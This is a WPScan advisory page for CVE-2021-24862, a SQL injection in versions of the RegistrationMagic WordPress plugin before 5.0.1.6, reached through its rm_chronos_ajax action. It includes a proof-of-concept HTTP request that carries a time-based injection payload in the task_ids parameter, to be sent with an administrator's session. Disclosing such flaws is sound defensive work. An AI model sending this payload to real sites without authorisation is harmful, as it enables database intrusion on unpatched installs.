WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

RegistrationMagic < 5.0.1.6 - Admin+ SQL Injection

Description

The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches, which could lead to a SQL injection issue

Proof of Concept

When there is at least one task (to created one, go to /wp-admin/admin.php?page=rm_ex_chronos_manage_tasks)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 99
Connection: close
Cookie: [admin+]

action=rm_chronos_ajax&rm_chronos_ajax_action=duplicate_tasks_batch&task_ids[]=1+and+sleep(10))--+-

Affects Plugins

custom-registration-form-builder-with-submission-manager
Fixed in version 5.0.1.6

References

CVE
CVE-2021-24862

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website
http://blog.szfszf.top
Verified

Yes

WPVDB ID
7d3af3b5-5548-419d-aa32-1f7b51622615

Timeline

Publicly Published

2021-12-08 (about 1 years ago)

Added

2021-12-08 (about 1 years ago)

Last Updated

2022-09-26 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin